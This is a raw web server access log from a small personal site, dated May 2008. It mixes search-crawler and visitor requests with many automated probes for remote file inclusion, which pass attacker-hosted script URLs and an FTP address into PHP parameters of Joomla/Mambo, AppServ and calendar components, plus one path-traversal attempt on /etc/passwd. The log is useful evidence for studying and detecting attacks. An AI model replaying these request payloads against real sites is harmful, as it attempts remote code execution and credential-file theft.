67.195.37.172 - - [10/May/2008:04:19:47 -0500] "GET /logs/ HTTP/1.0" 200 82835 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.3.167.234 - - [10/May/2008:04:22:49 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
212.58.4.204 - - [10/May/2008:04:22:50 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
83.3.167.234 - - [10/May/2008:04:22:50 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
212.58.4.204 - - [10/May/2008:04:22:50 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
83.3.167.234 - - [10/May/2008:04:22:50 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
212.58.4.204 - - [10/May/2008:04:22:50 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
212.58.4.204 - - [10/May/2008:04:23:00 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
83.3.167.234 - - [10/May/2008:04:23:00 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
68.239.121.23 - - [10/May/2008:04:23:46 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5"
68.239.121.23 - - [10/May/2008:04:23:46 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5"
68.239.121.23 - - [10/May/2008:04:23:46 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5"
68.239.121.23 - - [10/May/2008:04:23:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5"
68.239.121.23 - - [10/May/2008:04:23:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5"
65.55.208.131 - - [10/May/2008:04:26:11 -0500] "GET /logs/access_log.1179878400 HTTP/1.1" 200 120274 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.76.45 - - [10/May/2008:04:26:30 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.71.120.220 - - [10/May/2008:04:26:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.msn.no/results.aspx?q=tattoo+flash&FORM=MSNH&CP=65001&mkt=nb-no""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={DF963DAA-D8BF-44E3-9B4D-B08C42D8F32C}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
193.71.120.220 - - [10/May/2008:04:26:58 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={DF963DAA-D8BF-44E3-9B4D-B08C42D8F32C}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
193.71.120.220 - - [10/May/2008:04:26:58 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={DF963DAA-D8BF-44E3-9B4D-B08C42D8F32C}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
193.71.120.220 - - [10/May/2008:04:26:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={DF963DAA-D8BF-44E3-9B4D-B08C42D8F32C}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.6.25.101 - - [10/May/2008:04:28:52 -0500] "GET /logs/access_log.1196380800 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.48 - - [10/May/2008:04:31:06 -0500] "GET /logs/access_log.1156118400 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.234.70.40 - - [10/May/2008:04:35:42 -0500] "GET //appserv/main.php?appserv_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.234.70.40 - - [10/May/2008:04:35:42 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.i-promo.info/test.txt? HTTP/1.1" 404 306 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.65.76.195 - - [10/May/2008:04:36:06 -0500] "GET /logs//?page=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 82992 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:04:36:12 -0500] "GET //?page=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
72.29.81.233 - - [10/May/2008:04:39:59 -0500] "GET /logs/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
72.29.81.233 - - [10/May/2008:04:39:59 -0500] "GET /send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
74.6.20.51 - - [10/May/2008:04:40:57 -0500] "GET /logs/access_log.1175644800 HTTP/1.0" 200 96801 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.230.10.251 - - [10/May/2008:04:41:02 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
87.230.10.251 - - [10/May/2008:04:41:02 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
87.230.10.251 - - [10/May/2008:04:41:03 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
87.230.10.251 - - [10/May/2008:04:41:10 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:04:46:38 -0500] "GET /send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:04:53:05 -0500] "GET /send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:04:53:06 -0500] "GET /send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
74.6.24.169 - - [10/May/2008:04:54:12 -0500] "GET /logs/access_log.1186444800 HTTP/1.0" 200 206034 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.15.138.183 - - [10/May/2008:04:54:53 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
64.15.138.183 - - [10/May/2008:04:54:54 -0500] "GET //Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
64.15.138.183 - - [10/May/2008:04:54:54 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
64.15.138.183 - - [10/May/2008:04:54:58 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
67.59.151.227 - - [10/May/2008:04:55:42 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:04:55:42 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:04:55:42 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:04:55:45 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
80.65.76.195 - - [10/May/2008:04:59:07 -0500] "GET /logs//?page=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 82992 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:04:59:14 -0500] "GET //?page=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
72.47.201.117 - - [10/May/2008:05:01:10 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
72.47.201.117 - - [10/May/2008:05:01:10 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
72.47.201.117 - - [10/May/2008:05:01:10 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
72.47.201.117 - - [10/May/2008:05:01:13 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
74.6.21.244 - - [10/May/2008:05:04:12 -0500] "GET /logs/access_log.1170547200 HTTP/1.0" 200 100323 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.65.76.195 - - [10/May/2008:05:07:29 -0500] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mrneti.110mb.com/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:05:07:32 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mrneti.110mb.com/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:05:07:35 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mrneti.110mb.com/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
189.25.246.196 - - [10/May/2008:05:09:47 -0500] "GET /logs//appserv/main.php?appserv_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
189.25.246.196 - - [10/May/2008:05:09:51 -0500] "GET //appserv/main.php?appserv_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
74.6.7.93 - - [10/May/2008:05:09:56 -0500] "GET /logs/access_log.1208908800 HTTP/1.0" 200 275794 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.90.98 - - [10/May/2008:05:13:45 -0500] "GET /logs/access_log.1207180800/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:05:13:45 -0500] "GET /send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:05:13:45 -0500] "GET /logs/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
78.137.163.133 - - [10/May/2008:05:13:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [10/May/2008:05:13:59 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:00 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:01 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
78.137.163.133 - - [10/May/2008:05:14:01 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
81.169.139.91 - - [10/May/2008:05:25:12 -0500] "GET /logs/access_log.1207180800//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:05:25:12 -0500] "GET /logs/access_log.1207180800//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:05:25:12 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:05:25:12 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:05:25:12 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:05:25:13 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
65.55.208.137 - - [10/May/2008:05:26:44 -0500] "GET /logs/access_log.1195084800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.65.34.76 - - [10/May/2008:05:27:34 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
62.65.34.76 - - [10/May/2008:05:27:35 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
62.65.34.76 - - [10/May/2008:05:27:35 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:05:33:09 -0500] "GET /logs/access_log.1207180800/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:05:33:09 -0500] "GET /logs/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
74.6.21.113 - - [10/May/2008:05:34:51 -0500] "GET /logs/access_log.1165536000 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.16.18 - - [10/May/2008:05:36:08 -0500] "GET /index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.195.37.172 - - [10/May/2008:05:37:21 -0500] "GET /memorial/ HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.185 - - [10/May/2008:05:41:19 -0500] "GET /logs/access_log.1169337600 HTTP/1.0" 200 234097 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.146.251.123 - - [10/May/2008:05:41:27 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
203.146.251.123 - - [10/May/2008:05:41:28 -0500] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
208.111.154.100 - - [10/May/2008:05:44:03 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.100 - - [10/May/2008:05:44:03 -0500] "GET /icons/back.gif HTTP/1.0" 200 216 "http://tomdolan.pconline.com/?M=D""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.100 - - [10/May/2008:05:44:03 -0500] "GET /icons/blank.gif HTTP/1.0" 200 148 "http://tomdolan.pconline.com/?M=D""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.100 - - [10/May/2008:05:44:03 -0500] "GET /icons/folder.gif HTTP/1.0" 200 225 "http://tomdolan.pconline.com/?M=D""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.100 - - [10/May/2008:05:44:03 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
208.111.154.100 - - [10/May/2008:05:44:03 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
72.233.5.74 - - [10/May/2008:05:45:52 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
72.233.5.74 - - [10/May/2008:05:45:52 -0500] "GET /index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.64"
72.233.5.74 - - [10/May/2008:05:45:52 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.64"
72.233.5.74 - - [10/May/2008:05:47:12 -0500] "GET /logs/access_log.1204761600/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
193.51.215.1 - - [10/May/2008:05:58:05 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.0" 404 331 "-""libwww-perl/5.803"
193.51.215.1 - - [10/May/2008:05:58:06 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.0" 404 326 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:06:03:11 -0500] "GET /logs/access_log.1207180800/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:06:03:12 -0500] "GET /logs/access_log.1207180800/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:06:03:12 -0500] "GET /logs/send_reminders.php?includedir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
67.15.90.98 - - [10/May/2008:06:03:12 -0500] "GET /logs/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
72.29.81.233 - - [10/May/2008:06:09:38 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
72.29.81.233 - - [10/May/2008:06:09:38 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
74.6.9.52 - - [10/May/2008:06:10:57 -0500] "GET /logs/access_log.1159833600 HTTP/1.0" 200 150675 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.216.203.6 - - [10/May/2008:06:16:13 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:14 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:14 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:19 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:35 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:35 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:36 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:06:16:39 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
200.37.173.162 - - [10/May/2008:06:20:44 -0500] "GET //modules/my_egallery/index.php?do=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
200.37.173.162 - - [10/May/2008:06:20:45 -0500] "GET /logs//modules/my_egallery/index.php?do=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
65.55.208.120 - - [10/May/2008:06:21:55 -0500] "GET /logs/access_log.1189036800 HTTP/1.1" 200 294033 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.24.219 - - [10/May/2008:06:24:13 -0500] "GET /logs/access_log.1167609600 HTTP/1.0" 200 186730 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.172 - - [10/May/2008:06:28:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.23.225 - - [10/May/2008:06:28:31 -0500] "GET /logs/access_log.1195948800 HTTP/1.0" 200 211163 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.93.200.156 - - [10/May/2008:06:32:00 -0500] "GET /logs/access_log.1207180800//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
195.93.200.156 - - [10/May/2008:06:32:00 -0500] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
195.93.200.156 - - [10/May/2008:06:32:00 -0500] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
